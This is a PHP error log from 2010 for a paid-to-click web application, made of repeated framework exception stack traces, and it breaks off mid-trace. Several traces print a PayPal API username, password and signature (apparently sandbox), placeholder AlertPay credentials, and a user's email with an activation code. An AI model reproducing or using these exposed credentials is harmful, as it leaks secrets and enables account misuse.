#0 Santilga_Error->ExceptionHandler(Santilga_Object_Exception Object ([] => No Such Property:name,[] => ,[] => 0,[] => C:\Server\ptc\libraries\santilga\object\Object.php,[] => 20,[] => Array ([0] => Array ([file] => C:\Server\ptc\application\templates\admin\edit\config.php,[line] => 18,[function] => __get,[class] => Santilga_Object,[type] => ->,[args] => Array ([0] => name)),[1] => Array ([file] => C:\Server\ptc\libraries\santilga\view\View.php,[line] => 43,[args] => Array ([0] => C:\Server\ptc\application\templates\admin\edit\config.php),[function] => include),[2] => Array ([file] => C:\Server\ptc\libraries\santilga\view\View.php,[line] => 138,[function] => renderTemplate,[class] => Santilga_View,[type] => ->,[args] => Array ([0] => config,[1] => edit,[2] => )),[3] => Array ([file] => C:\Server\ptc\application\controllers\Admin.php,[line] => 1083,[function] => content,[class] => Santilga_View,[type] => ->,[args] => Array ([0] => config,[1] => edit)),[4] => Array ([file] => C:\Server\ptc\libraries\santilga\controller\Controller.php,[line] => 131,[function] => configAddAction,[class] => Admin_Controller,[type] => ->,[args] => Array ()),[5] => Array ([file] => C:\Server\ptc\libraries\santilga\application\Application.php,[line] => 49,[function] => dispatch,[class] => Santilga_Controller,[type] => ->,[args] => Array ()),[6] => Array ([file] => C:\Server\ptc\index.php,[line] => 37,[function] => run,[class] => Santilga_Application,[type] => ->,[args] => Array ()))))
Error!! 01.07.10 12:40:30- Uncaught Santilga_Object_Exception, code: 0,Message: No Such Property:name

#0 Santilga_Error->ExceptionHandler(Santilga_Object_Exception Object ([] => No Such Property:name,[] => ,[] => 0,[] => C:\Server\ptc\libraries\santilga\object\Object.php,[] => 20,[] => Array ([0] => Array ([file] => C:\Server\ptc\application\templates\admin\edit\config.php,[line] => 18,[function] => __get,[class] => Santilga_Object,[type] => ->,[args] => Array ([0] => name)),[1] => Array ([file] => C:\Server\ptc\libraries\santilga\view\View.php,[line] => 43,[args] => Array ([0] => C:\Server\ptc\application\templates\admin\edit\config.php),[function] => include),[2] => Array ([file] => C:\Server\ptc\libraries\santilga\view\View.php,[line] => 138,[function] => renderTemplate,[class] => Santilga_View,[type] => ->,[args] => Array ([0] => config,[1] => edit,[2] => )),[3] => Array ([file] => C:\Server\ptc\application\controllers\Admin.php,[line] => 1084,[function] => content,[class] => Santilga_View,[type] => ->,[args] => Array ([0] => config,[1] => edit)),[4] => Array ([file] => C:\Server\ptc\libraries\santilga\controller\Controller.php,[line] => 131,[function] => configAddAction,[class] => Admin_Controller,[type] => ->,[args] => Array ()),[5] => Array ([file] => C:\Server\ptc\libraries\santilga\application\Application.php,[line] => 49,[function] => dispatch,[class] => Santilga_Controller,[type] => ->,[args] => Array ()),[6] => Array ([file] => C:\Server\ptc\index.php,[line] => 37,[function] => run,[class] => Santilga_Application,[type] => ->,[args] => Array ()))))
Error!! 01.07.10 12:40:36- Uncaught Santilga_Object_Exception, code: 0,Message: No Such Property:name

#0 Santilga_Error->ExceptionHandler(Santilga_Object_Exception Object ([] => No Such Property:name,[] => ,[] => 0,[] => C:\Server\ptc\libraries\santilga\object\Object.php,[] => 20,[] => Array ([0] => Array ([file] => C:\Server\ptc\application\templates\admin\edit\config.php,[line] => 18,[function] => __get,[class] => Santilga_Object,[type] => ->,[args] => Array ([0] => name)),[1] => Array ([file] => C:\Server\ptc\libraries\santilga\view\View.php,[line] => 43,[args] => Array ([0] => C:\Server\ptc\application\templates\admin\edit\config.php),[function] => include),[2] => Array ([file] => C:\Server\ptc\libraries\santilga\view\View.php,[line] => 138,[function] => renderTemplate,[class] => Santilga_View,[type] => ->,[args] => Array ([0] => config,[1] => edit,[2] => )),[3] => Array ([file] => C:\Server\ptc\application\controllers\Admin.php,[line] => 1084,[function] => content,[class] => Santilga_View,[type] => ->,[args] => Array ([0] => config,[1] => edit)),[4] => Array ([file] => C:\Server\ptc\libraries\santilga\controller\Controller.php,[line] => 131,[function] => configAddAction,[class] => Admin_Controller,[type] => ->,[args] => Array ()),[5] => Array ([file] => C:\Server\ptc\libraries\santilga\application\Application.php,[line] => 49,[function] => dispatch,[class] => Santilga_Controller,[type] => ->,[args] => Array ()),[6] => Array ([file] => C:\Server\ptc\index.php,[line] => 37,[function] => run,[class] => Santilga_Application,[type] => ->,[args] => Array ()))))
Error!! 01.07.10 12:45:04- Uncaught Santilga_Database_Exception, code: 1054,Message: Unknown column 'dateStart' in 'field list',SQL:UPDATE config SET `id`='1',`name`='username',`value`='abo132',`section`='paypal',`dateStart`='1970-01-01 00:00:00' WHERE id in (1)

#0 Santilga_Error->ExceptionHandler(Santilga_Database_Exception Object ([] => Unknown column 'dateStart' in 'field list',SQL:UPDATE config SET `id`='1',`name`='username',`value`='abo132',`section`='paypal',`dateStart`='1970-01-01 00:00:00' WHERE id in (1) ,[] => ,[] => 1054,[] => C:\Server\ptc\libraries\santilga\database\driver\Mysql.php,[] => 62,[] => Array ([0] => Array ([file] => C:\Server\ptc\libraries\santilga\model\Model.php,[line] => 344,[function] => query,[class] => Santilga_Database_Driver_Mysql,[type] => ->,[args] => Array ([0] => UPDATE config SET `id`='1',`name`='username',`value`='abo132',`section`='paypal',`dateStart`='1970-01-01 00:00:00' WHERE id in (1) )),[1] => Array ([file] => C:\Server\ptc\application\controllers\Admin.php,[line] => 974,[function] => updateBean,[class] => Santilga_Model,[type] => ->,[args] => Array ([0] => 1,[1] => Array ([id] => 1,[name] => username,[value] => abo132,[section] => paypal,[dateStart] => 1970-01-01 00:00:00))),[2] => Array ([file] => C:\Server\ptc\libraries\santilga\controller\Controller.php,[line] => 131,[function] => configEditAction,[class] => Admin_Controller,[type] => ->,[args] => Array ()),[3] => Array ([file] => C:\Server\ptc\libraries\santilga\application\Application.php,[line] => 49,[function] => dispatch,[class] => Santilga_Controller,[type] => ->,[args] => Array ()),[4] => Array ([file] => C:\Server\ptc\index.php,[line] => 37,[function] => run,[class] => Santilga_Application,[type] => ->,[args] => Array ()))))
Error!! 01.07.10 12:45:16- Uncaught Santilga_Database_Exception, code: 1054,Message: Unknown column 'dateStart' in 'field list',SQL:UPDATE config SET `id`='1',`name`='username',`value`='abo132',`section`='paypal',`dateStart`='1970-01-01 00:00:00' WHERE id in (1)

#0 Santilga_Error->ExceptionHandler(Santilga_Database_Exception Object ([] => Unknown column 'dateStart' in 'field list',SQL:UPDATE config SET `id`='1',`name`='username',`value`='abo132',`section`='paypal',`dateStart`='1970-01-01 00:00:00' WHERE id in (1) ,[] => ,[] => 1054,[] => C:\Server\ptc\libraries\santilga\database\driver\Mysql.php,[] => 62,[] => Array ([0] => Array ([file] => C:\Server\ptc\libraries\santilga\model\Model.php,[line] => 344,[function] => query,[class] => Santilga_Database_Driver_Mysql,[type] => ->,[args] => Array ([0] => UPDATE config SET `id`='1',`name`='username',`value`='abo132',`section`='paypal',`dateStart`='1970-01-01 00:00:00' WHERE id in (1) )),[1] => Array ([file] => C:\Server\ptc\application\controllers\Admin.php,[line] => 974,[function] => updateBean,[class] => Santilga_Model,[type] => ->,[args] => Array ([0] => 1,[1] => Array ([id] => 1,[name] => username,[value] => abo132,[section] => paypal,[dateStart] => 1970-01-01 00:00:00))),[2] => Array ([file] => C:\Server\ptc\libraries\santilga\controller\Controller.php,[line] => 131,[function] => configEditAction,[class] => Admin_Controller,[type] => ->,[args] => Array ()),[3] => Array ([file] => C:\Server\ptc\libraries\santilga\application\Application.php,[line] => 49,[function] => dispatch,[class] => Santilga_Controller,[type] => ->,[args] => Array ()),[4] => Array ([file] => C:\Server\ptc\index.php,[line] => 37,[function] => run,[class] => Santilga_Application,[type] => ->,[args] => Array ()))))
Error!! 03.07.10 08:47:48- Uncaught Santilga_Exception, code: 0,Message: Config already contains this section

#0 Santilga_Error->ExceptionHandler(Santilga_Exception Object ([] => Config already contains this section,[] => ,[] => 0,[] => C:\Server\ptc\libraries\santilga\config\Config.php,[] => 44,[] => Array ([0] => Array ([file] => C:\Server\ptc\application\Init.php,[line] => 41,[function] => addSection,[class] => Santilga_Config,[type] => ->,[args] => Array ([0] => custom,[1] => Santilga_Blank Object ([] => Array ([params] => Array (),[alertpay] => Santilga_Blank Object ([] => Array ([params] => Array (),[email] => email@email.de,[password] => 123,[apikey] => 132456,[isApiLive] => 0)),[paypal] => Santilga_Blank Object ([] => Array ([params] => Array (),[email] => seller_1262861424_biz_api1.gmail.com,[password] => T9FY85CEQGNE7FTU,[apikey] => AcNO5ENYYmm-4pZYPAoZ4aXYRLDtAWDEbjG1WzzDocv4iELalldgDDe2,[isApiLive] => 0)))))),[1] => Array ([file] => C:\Server\ptc\application\Init.php,[line] => 8,[function] => addCustomConfig,[class] => Init,[type] => ->,[args] => Array ()),[2] => Array ([file] => C:\Server\ptc\libraries\santilga\application\Application.php,[line] => 32,[function] => init,[class] => Init,[type] => ->,[args] => Array ()),[3] => Array ([file] => C:\Server\ptc\index.php,[line] => 35,[function] => __construct,[class] => Santilga_Application,[type] => ->,[args] => Array ()))))
Error!! 03.07.10 08:48:25- Uncaught Santilga_Exception, code: 0,Message: Config already contains this section

#0 Santilga_Error->ExceptionHandler(Santilga_Exception Object ([] => Config already contains this section,[] => ,[] => 0,[] => C:\Server\ptc\libraries\santilga\config\Config.php,[] => 44,[] => Array ([0] => Array ([file] => C:\Server\ptc\application\Init.php,[line] => 41,[function] => addSection,[class] => Santilga_Config,[type] => ->,[args] => Array ([0] => custom,[1] => Santilga_Blank Object ([] => Array ([params] => Array (),[alertpay] => Santilga_Blank Object ([] => Array ([params] => Array (),[email] => email@email.de,[password] => 123,[apikey] => 132456,[isApiLive] => 0)),[paypal] => Santilga_Blank Object ([] => Array ([params] => Array (),[email] => seller_1262861424_biz_api1.gmail.com,[password] => T9FY85CEQGNE7FTU,[apikey] => AcNO5ENYYmm-4pZYPAoZ4aXYRLDtAWDEbjG1WzzDocv4iELalldgDDe2,[isApiLive] => 0)))))),[1] => Array ([file] => C:\Server\ptc\application\Init.php,[line] => 8,[function] => addCustomConfig,[class] => Init,[type] => ->,[args] => Array ()),[2] => Array ([file] => C:\Server\ptc\libraries\santilga\application\Application.php,[line] => 31,[function] => init,[class] => Init,[type] => ->,[args] => Array ()),[3] => Array ([file] => C:\Server\ptc\index.php,[line] => 35,[function] => __construct,[class] => Santilga_Application,[type] => ->,[args] => Array ()))))
Error!! 03.07.10 08:50:06- Uncaught Santilga_Exception, code: 0,Message: Config already contains this section

#0 Santilga_Error->ExceptionHandler(Santilga_Exception Object ([] => Config already contains this section,[] => ,[] => 0,[] => C:\Server\ptc\libraries\santilga\config\Config.php,[] => 47,[] => Array ([0] => Array ([file] => C:\Server\ptc\application\Init.php,[line] => 41,[function] => addSection,[class] => Santilga_Config,[type] => ->,[args] => Array ([0] => custom,[1] => Santilga_Blank Object ([] => Array ([params] => Array (),[alertpay] => Santilga_Blank Object ([] => Array ([params] => Array (),[email] => email@email.de,[password] => 123,[apikey] => 132456,[isApiLive] => 0)),[paypal] => Santilga_Blank Object ([] => Array ([params] => Array (),[email] => seller_1262861424_biz_api1.gmail.com,[password] => T9FY85CEQGNE7FTU,[apikey] => AcNO5ENYYmm-4pZYPAoZ4aXYRLDtAWDEbjG1WzzDocv4iELalldgDDe2,[isApiLive] => 0)))))),[1] => Array ([file] => C:\Server\ptc\application\Init.php,[line] => 8,[function] => addCustomConfig,[class] => Init,[type] => ->,[args] => Array ()),[2] => Array ([file] => C:\Server\ptc\libraries\santilga\application\Application.php,[line] => 32,[function] => init,[class] => Init,[type] => ->,[args] => Array ()),[3] => Array ([file] => C:\Server\ptc\index.php,[line] => 35,[function] => __construct,[class] => Santilga_Application,[type] => ->,[args] => Array ()))))
Error!! 03.07.10 09:19:21- Uncaught Santilga_Exception, code: 0,Message: Config already contains this section

#0 Santilga_Error->ExceptionHandler(Santilga_Exception Object ([] => Config already contains this section,[] => ,[] => 0,[] => C:\Server\ptc\libraries\santilga\config\Config.php,[] => 48,[] => Array ([0] => Array ([file] => C:\Server\ptc\application\Init.php,[line] => 47,[function] => addSection,[class] => Santilga_Config,[type] => ->,[args] => Array ([0] => custom,[1] => Santilga_Blank Object ([] => Array ([params] => Array (),[alertpay] => Santilga_Blank Object ([] => Array ([params] => Array (),[email] => email@email.de,[password] => 123,[apikey] => 132456,[isApiLive] => 0)),[paypal] => Santilga_Blank Object ([] => Array ([params] => Array (),[email] => seller_1262861424_biz_api1.gmail.com,[password] => T9FY85CEQGNE7FTU,[apikey] => AcNO5ENYYmm-4pZYPAoZ4aXYRLDtAWDEbjG1WzzDocv4iELalldgDDe2,[isApiLive] => 0)))))),[1] => Array ([file] => C:\Server\ptc\application\Init.php,[line] => 12,[function] => addCustomConfig,[class] => Init,[type] => ->,[args] => Array ()),[2] => Array ([file] => C:\Server\ptc\libraries\santilga\application\Application.php,[line] => 33,[function] => init,[class] => Init,[type] => ->,[args] => Array ()),[3] => Array ([file] => C:\Server\ptc\index.php,[line] => 35,[function] => __construct,[class] => Santilga_Application,[type] => ->,[args] => Array ()))))
Error!! 05.07.10 11:04:22- WARNING: include(C:\Server\ptc\application/templates/ptc/add/rental.php) [function.include]: failed to open stream: No such file or directory in C:\Server\ptc\libraries\santilga\view\View.php on line 43

#0 Santilga_Error->ErrorHandler(2, include(C:\Server\ptc\application/templates/ptc/add/rental.php) [function.include]: failed to open stream: No such file or directory, C:\Server\ptc\libraries\santilga\view\View.php, 43, Array ([templateFile] => rental.php,[templateSection] => add,[render] => )) called at [C:\Server\ptc\libraries\santilga\view\View.php:43]
#1 Santilga_View::renderTemplate() called at [C:\Server\ptc\libraries\santilga\view\View.php:43]
#2 Santilga_View->renderTemplate(rental, add, ) called at [C:\Server\ptc\libraries\santilga\view\View.php:138]
#3 Santilga_View->content(rental, add) called at [C:\Server\ptc\application\controllers\Rental.php:10]
#4 Rental_Controller->addAction() called at [C:\Server\ptc\libraries\santilga\controller\Controller.php:131]
#5 Santilga_Controller->dispatch() called at [C:\Server\ptc\libraries\santilga\application\Application.php:48]
#6 Santilga_Application->run() called at [C:\Server\ptc\index.php:37]
Error!! 07.07.10 08:35:27- WARNING: mail() [function.mail]: Failed to connect to mailserver at "localhost" port 25, verify your "SMTP" and "smtp_port" setting in php.ini or use ini_set() in C:\Server\ptc\application\helpers\Mail.php on line 105

#0 Santilga_Error->ErrorHandler(2, mail() [function.mail]: Failed to connect to mailserver at "localhost" port 25, verify your "SMTP" and "smtp_port" setting in php.ini or use ini_set(), C:\Server\ptc\application\helpers\Mail.php, 105, Array ([headers] => Content-type: text/html; charset=utf-8
From: ptccloud.com
Reply-To: ptccloud.com ))
#1 mail(lolo@gmail.com, Activation Required, To finalize registration please fill in activation code here
http://192.168.1.3/ptc/user/validate
activation code is : 4f7ebb71de8d12ec002f, Content-type: text/html; charset=utf-8
From: ptccloud.com
Reply-To: ptccloud.com , ) called at [C:\Server\ptc\application\helpers\Mail.php:105]
#2 Mail_Helper->sendMail() called at [C:\Server\ptc\application\controllers\User.php:331]
#3 User_Controller->_sendActivationEmail(lolo@gmail.com, lolo, 4f7ebb71de8d12ec002f) called at [C:\Server\ptc\application\controllers\User.php:109]
#4 User_Controller->registerAction() called at [C:\Server\ptc\libraries\santilga\controller\Controller.php:131]
#5 Santilga_Controller->dispatch() called at [C:\Server\ptc\libraries\santilga\application\Application.php:48]
#6 Santilga_Application->run() called at [C:\Server\ptc\index.php:37]
Error!! 07.07.10 11:09:55- Uncaught Santilga_Helper_Exception, code: 0,Message: No such helper exist - user

#0 Santilga_Error->ExceptionHandler(Santilga_Helper_Exception Object ([] => No such helper exist - user,[] => ,[] => 0,[] => C:\Server\ptc\libraries\santilga\helper\Helper.php,[] => 19,[] => Array ([0] => Array ([file] => C:\Server\ptc\application\controllers\Click.php,[line] => 11,[function] => __get,[class] => Santilga_Helper,[type] => ->,[args] => Array ([0] => user)),[1] => Array ([file] => C:\Server\ptc\libraries\santilga\controller\Controller.php,[line] => 131,[function] => purchaseAction,[class] => Click_Controller,[type] => ->,[args] => Array ()),[2] => Array ([file] => C:\Server\ptc\libraries\santilga\application\Application.php,[line] => 48,[function] => dispatch,[class] => Santilga_Controller,[type] => ->,[args] => Array ()),[3] => Array ([file] => C:\Server\ptc\index.php,[line] => 37,[function] => run,[class] => Santilga_Application,[type] => ->,[args] => Array ()))))
Error!! 07.07.10 11:44:41- Uncaught Santilga_Helper_Exception, code: 0,Message: No such helper exist - user

#0 Santilga_Error->ExceptionHandler(Santilga_Helper_Exception Object ([] => No such helper exist - user,[] => ,[] => 0,[] => C:\Server\ptc\libraries\santilga\helper\Helper.php,[] => 19,[] => Array ([0] => Array ([file] => C:\Server\ptc\application\controllers\Click.php,[line] => 11,[function] => __get,[class] => Santilga_Helper,[type] => ->,[args] => Array ([0] => user)),[1] => Array ([file] => C:\Server\ptc\libraries\santilga\controller\Controller.php,[line] => 131,[function] => purchaseAction,[class] => Click_Controller,[type] => ->,[args] => Array ()),[2] => Array ([file] => C:\Server\ptc\libraries\santilga\application\Application.php,[line] => 48,[function] => dispatch,[class] => Santilga_Controller,[type] => ->,[args] => Array ()),[3] => Array ([file] => C:\Server\ptc\index.php,[line] => 37,[function] => run,[class] => Santilga_Application,[type] => ->,[args] => Array ()))))
Error!! 07.07.10 11:44:51- Uncaught Santilga_Helper_Exception, code: 0,Message: No such helper exist - user

#0 Santilga_Error->ExceptionHandler(Santilga_Helper_Exception Object ([] => No such helper exist - user,[] => ,[] => 0,[] => C:\Server\ptc\libraries\santilga\helper\Helper.php,[] => 19,[] => Array ([0] => Array ([file] => C:\Server\ptc\application\controllers\Click.php,[line] => 11,[function] => __get,[class] => Santilga_Helper,[type] => ->,[args] => Array ([0] => user)),[1] => Array ([file] => C:\Server\ptc\libraries\santilga\controller\Controller.php,[line] => 131,[function] => purchaseAction,[class] => Click_Controller,[type] => ->,[args] => Array ()),[2] => Array ([file] => C:\Server\ptc\libraries\santilga\application\Application.php,[line] => 48,[function] => dispatch,[class] => Santilga_Controller,[type] => ->,[args] => Array ()),[3] => Array ([file] => C:\Server\ptc\index.php,[line] => 37,[function] => run,[class] => Santilga_Application,[type] => ->,[args] => Array ()))))
Error!! 07.07.10 11:45:01- Uncaught Santilga_Object_Exception, code: 0,Message: No Such Property:published

#0 Santilga_Error->ExceptionHandler(Santilga_Object_Exception Object ([] => No Such Property:published,[] => ,[] => 0,[] => C:\Server\ptc\libraries\santilga\object\Object.php,[] => 11,[] => Array ([0] => Array ([file] => C:\Server\ptc\libraries\santilga\model\Model.php,[line] => 132,[function] => __set,[class] => Santilga_Object,[type] => ->,[args] => Array ([0] => published,[1] => 1)),[1] => Array ([file] => C:\Server\ptc\libraries\santilga\model\Model.php,[line] => 192,[function] => fillBeanFromArray,[class] => Santilga_Model,[type] => ->,[args] => Array ([0] => Array ([id] => 1,[clickCount] => 200,[type] => 15,[price] => 2,[active] => 0,[published] => 1),[1] => Clickpack_Bean Object ([] => clickpack,[] => id,[] => 1,[] => 200,[] => 15,[] => 2,[] => 0))),[2] => Array ([file] => C:\Server\ptc\application\controllers\Click.php,[line] => 34,[function] => getBeanList,[class] => Santilga_Model,[type] => ->,[args] => Array ([0] => Array ([0] => published='1'),[1] => Array ())),[3] => Array ([file] => C:\Server\ptc\application\controllers\Click.php,[line] => 13,[function] => _getClickPacks,[class] => Click_Controller,[type] => ->,[args] => Array ()),[4] => Array ([file] => C:\Server\ptc\libraries\santilga\controller\Controller.php,[line] => 131,[function] => purchaseAction,[class] => Click_Controller,[type] => ->,[args] => Array ()),[5] => Array ([file] => C:\Server\ptc\libraries\santilga\application\Application.php,[line] => 48,[function] => dispatch,[class] => Santilga_Controller,[type] => ->,[args] => Array ()),[6] => Array ([file] => C:\Server\ptc\index.php,[line] => 37,[function] => run,[class] => Santilga_Application,[type] => ->,[args] => Array ()))))
Error!! 08.07.10 11:44:13- Uncaught Santilga_Object_Exception, code: 0,Message: No Such Property:default

#0 Santilga_Error->ExceptionHandler(Santilga_Object_Exception Object ([] => No Such Property:default,[] => ,[] => 0,[] => C:\Server\ptc\libraries\santilga\object\Object.php,[] => 11,[] => Array ([0] => Array ([file] => C:\Server\ptc\libraries\santilga\model\Model.php,[line] => 132,[function] => __set,[class] => Santilga_Object,[type] => ->,[args] => Array ([0] => default,[1] => 0)),[1] => Array ([file] => C:\Server\ptc\libraries\santilga\model\Model.php,[line] => 192,[function] => fillBeanFromArray,[class] => Santilga_Model,[type] => ->,[args] => Array ([0] => Array ([id] => 1,[clickCount] => 200,[type] => 15,[price] => 2,[active] => 0,[default] => 0,[published] => 1),[1] => Clickpack_Bean Object ([] => clickpack,[] => id,[] => 1,[] => 200,[] => 15,[] => 2,[] => 0,[] => ))),[2] => Array ([file] => C:\Server\ptc\application\controllers\Click.php,[line] => 41,[function] => getBeanList,[class] => Santilga_Model,[type] => ->,[args] => Array ([0] => Array ([0] => published='1'),[1] => Array ())),[3] => Array ([file] => C:\Server\ptc\application\controllers\Click.php,[line] => 13,[function] => _getClickPacks,[class] => Click_Controller,[type] => ->,[args] => Array ()),[4] => Array ([file] => C:\Server\ptc\libraries\santilga\controller\Controller.php,[line] => 131,[function] => purchaseAction,[class] => Click_Controller,[type] => ->,[args] => Array ()),[5] => Array ([file] => C:\Server\ptc\libraries\santilga\application\Application.php,[line] => 48,[function] => dispatch,[class] => Santilga_Controller,[type] => ->,[args] => Array ()),[6] => Array ([file] => C:\Server\ptc\index.php,[line] => 37,[function] => run,[class] => Santilga_Application,[type] => ->,[args] => Array ()))))
Error!! 09.07.10 06:03:45- Uncaught Santilga_Object_Exception, code: 0,Message: No Such Property:_config

#0 Santilga_Error->ExceptionHandler(Santilga_Object_Exception Object ([] => No Such Property:_config,[] => ,[] => 0,[] => C:\Server\ptc\libraries\santilga\object\Object.php,[] => 20,[] => Array ([0] => Array ([file] => C:\Server\ptc\application\controllers\Click.php,[line] => 41,[function] => __get,[class] => Santilga_Object,[type] => ->,[args] => Array ([0] => _config)),[1] => Array ([file] => C:\Server\ptc\libraries\santilga\controller\Controller.php,[line] => 131,[function] => purchaseAction,[class] => Click_Controller,[type] => ->,[args] => Array ()),[2] => Array ([file] => C:\Server\ptc\libraries\santilga\application\Application.php,[line] => 48,[function] => dispatch,[class] => Santilga_Controller,[type] => ->,[args] => Array ()),[3] => Array ([file] => C:\Server\ptc\index.php,[line] => 37,[function] => run,[class] => Santilga_Application,[type] => ->,[args] => Array ()))))
Error!! 09.07.10 12:24:53- Uncaught Santilga_Object_Exception, code: 0,Message: No Such Property:allowAccount

#0 Santilga_Error->ExceptionHandler(Santilga_Object_Exception Object ([] => No Such Property:allowAccount,[] => ,[] => 0,[] => C:\Server\ptc\libraries\santilga\object\Object.php,[] => 11,[] => Array ([0] => Array ([file] => C:\Server\ptc\application\controllers\Click.php,[line] => 48,[function] => __set,[class] => Santilga_Object,[type] => ->,[args] => Array ([0] => allowAccount,[1] => )),[1] => Array ([file] => C:\Server\ptc\libraries\santilga\controller\Controller.php,[line] => 131,[function] => purchaseAction,[class] => Click_Controller,[type] => ->,[args] => Array ()),[2] => Array ([file] => C:\Server\ptc\libraries\santilga\application\Application.php,[line] => 48,[function] => dispatch,[class] => Santilga_Controller,[type] => ->,[args] => Array ()),[3] => Array ([file] => C:\Server\ptc\index.php,[line] => 37,[function] => run,[class] => Santilga_Application,[type] => ->,[args] => Array ()))))
Error!! 09.07.10 12:25:09- WARNING: ob_start() [ref.outcontrol]: output handler 'ob_gzhandler' cannot be used twice in C:\Server\ptc\libraries\santilga\error\Error.php on line 152

#0 Santilga_Error->ErrorHandler(2, ob_start() [ref.outcontrol]: output handler 'ob_gzhandler' cannot be used twice, C:\Server\ptc\libraries\santilga\error\Error.php, 152, Array ([exception] => Santilga_Object_Exception Object ([] => No Such Property:pricce,[] => ,[] => 0,[] => C:\Server\ptc\libraries\santilga\object\Object.php,[] => 20,[] => Array ([0] => Array ([file] => C:\Server\ptc\application\templates\ptc\click\purchase.php,[line] => 64,[function] => __get,[class] => Santilga_Object,[type] => ->,[args] => Array ([0] => pricce)),[1] => Array ([file] => C:\Server\ptc\libraries\santilga\view\View.php,[line] => 43,[args] => Array ([0] => C:\Server\ptc\application\templates\ptc\click\purchase.php),[function] => include),[2] => Array ([file] => C:\Server\ptc\libraries\santilga\view\View.php,[line] => 153,[function] => renderTemplate,[class] => Santilga_View,[type] => ->,[args] => Array ([0] => purchase,[1] => click,[2] => )),[3] => Array ([file] => C:\Server\ptc\application\controllers\Click.php,[line] => 50,[function] => content,[class] => Santilga_View,[type] => ->,[args] => Array ([0] => purchase,[1] => click)),[4] => Array ([file] => C:\Server\ptc\libraries\santilga\controller\Controller.php,[line] => 131,[function] => purchaseAction,[class] => Click_Controller,[type] => ->,[args] => Array ()),[5] => Array ([file] => C:\Server\ptc\libraries\santilga\application\Application.php,[line] => 48,[function] => dispatch,[class] => Santilga_Controller,[type] => ->,[args] => Array ()),[6] => Array ([file] => C:\Server\ptc\index.php,[line] => 37,[function] => run,[class] => Santilga_Application,[type] => ->,[args] => Array ())))))
#1 ob_start(ob_gzhandler) called at [C:\Server\ptc\libraries\santilga\error\Error.php:152]
#2 Santilga_Error->ExceptionHandler(Santilga_Object_Exception Object ([] => No Such Property:pricce,[] => ,[] => 0,[] => C:\Server\ptc\libraries\santilga\object\Object.php,[] => 20,[] => Array ([0] => Array ([file] => C:\Server\ptc\application\templates\ptc\click\purchase.php,[line] => 64,[function] => __get,[class] => Santilga_Object,[type] => ->,[args] => Array ([0] => pricce)),[1] => Array ([file] => C:\Server\ptc\libraries\santilga\view\View.php,[line] => 43,[args] => Array ([0] => C:\Server\ptc\application\templates\ptc\click\purchase.php),[function] => include),[2] => Array ([file] => C:\Server\ptc\libraries\santilga\view\View.php,[line] => 153,[function] => renderTemplate,[class] => Santilga_View,[type] => ->,[args] => Array ([0] => purchase,[1] => click,[2] => )),[3] => Array ([file] => C:\Server\ptc\application\controllers\Click.php,[line] => 50,[function] => content,[class] => Santilga_View,[type] => ->,[args] => Array ([0] => purchase,[1] => click)),[4] => Array ([file] => C:\Server\ptc\libraries\santilga\controller\Controller.php,[line] => 131,[function] => purchaseAction,[class] => Click_Controller,[type] => ->,[args] => Array ()),[5] => Array ([file] => C:\Server\ptc\libraries\santilga\application\Application.php,[line] => 48,[function] => dispatch,[class] => Santilga_Controller,[type] => ->,[args] => Array ()),[6] => Array ([file] => C:\Server\ptc\index.php,[line] => 37,[function] => run,[class] => Santilga_Application,[type] => ->,[args] => Array ()))))
Error!! 09.07.10 12:25:32- RECOVERABLE ERROR: Object of class Paypal_Processor could not be converted to string in C:\Server\ptc\application\templates\ptc\click\purchase.php on line 73

#0 Santilga_Error->ErrorHandler(4096, Object of class Paypal_Processor could not be converted to string, C:\Server\ptc\application\templates\ptc\click\purchase.php, 73, Array ([templateFile] => purchase.php,[templateSection] => click,[render] => ,[pack] => Clickpack_Bean Object ([] => clickpack,[] => id,[] => 15,[] => 5000,[] => 60,[] => 155,[] => 1,[] => 0,[] => 1),[name] => 5000x60,[item] => 5000)) called at [C:\Server\ptc\application\templates\ptc\click\purchase.php:73]
#1 include(C:\Server\ptc\application\templates\ptc\click\purchase.php) called at [C:\Server\ptc\libraries\santilga\view\View.php:43]
#2 Santilga_View->renderTemplate(purchase, click, ) called at [C:\Server\ptc\libraries\santilga\view\View.php:153]
#3 Santilga_View->content(purchase, click) called at [C:\Server\ptc\application\controllers\Click.php:50]
#4 Click_Controller->purchaseAction() called at [C:\Server\ptc\libraries\santilga\controller\Controller.php:131]
#5 Santilga_Controller->dispatch() called at [C:\Server\ptc\libraries\santilga\application\Application.php:48]
#6 Santilga_Application->run() called at [C:\Server\ptc\index.php:37]
Error!! 13.07.10 08:14:29- Uncaught Santilga_Object_Exception, code: 0,Message: No Such Property:refferalPackLimit

#0 Santilga_Error->ExceptionHandler(Santilga_Object_Exception Object ([] => No Such Property:refferalPackLimit,[] => ,[] => 0,[] => C:\Server\ptc\libraries\santilga\object\Object.php,[] => 11,[] => Array ([0] => Array ([file] => C:\Server\ptc\libraries\santilga\model\Model.php,[line] => 132,[function] => __set,[class] => Santilga_Object,[type] => ->,[args] => Array ([0] => refferalPackLimit,[1] => )),[1] => Array ([file] => C:\Server\ptc\libraries\santilga\model\Model.php,[line] => 65,[function] => fillBeanFromArray,[class] => Santilga_Model,[type] => ->,[args] => Array ([0] => Array ([id] => 1,[name] => Standart,[refferalLimit] => 300,[refferalPackLimit] => ,[refferalMonthPrice] => ,[refferalAutopayPrice] => ,[haveRentalQueue] => 0,[joinPrice] => 2.000,[joinClicks] => ,[joinDays] => ,[rentalInterval] => ,[cashoutInterval] => ,[directRefferalClicks] => ,[directRefferalDays] => ,[vocationDays] => ,[inactivityReplacementDays] => ,[refferalReplacementFee] => ,[autopayMinimumDays] => ,[advertisementCount] => ,[standartClick] => 0.010,[standartRefferalClick] => 0.005,[extendedClick] => 0.015,[refferalExtendedClick] => 0.010,[miniClick] => 0.005,[price0to250] => ,[price251to500] => ,[price501to750] => ,[price751to1000] => ,[price1001to1250] => ,[price1251to1500] => ,[price1501to1750] => ,[price1751more] => ,[published] => 1),[1] => UserGroup_Bean Object ([] => user_group,[] => id,[] => 1,[] => Standart,[] => 300,[] => ,[] => ,[] => ,[] => ,[] => ,[] => ,[] => ,[] => ,[] => ,[] => ,[] => ,[] => ,[] => ,[] => ,[] => ,[] => ,[] => ,[] => ,[] => ,[] => ))),[2] => Array ([file] => C:\Server\ptc\application\controllers\Referal.php,[line] => 32,[function] => getBean,[class] => Santilga_Model,[type] => ->,[args] => Array ([0] => 1)),[3] => Array ([file] => C:\Server\ptc\libraries\santilga\controller\Controller.php,[line] => 131,[function] => indexAction,[class] => Referal_Controller,[type] => ->,[args] => Array ()),[4] => Array ([file] => 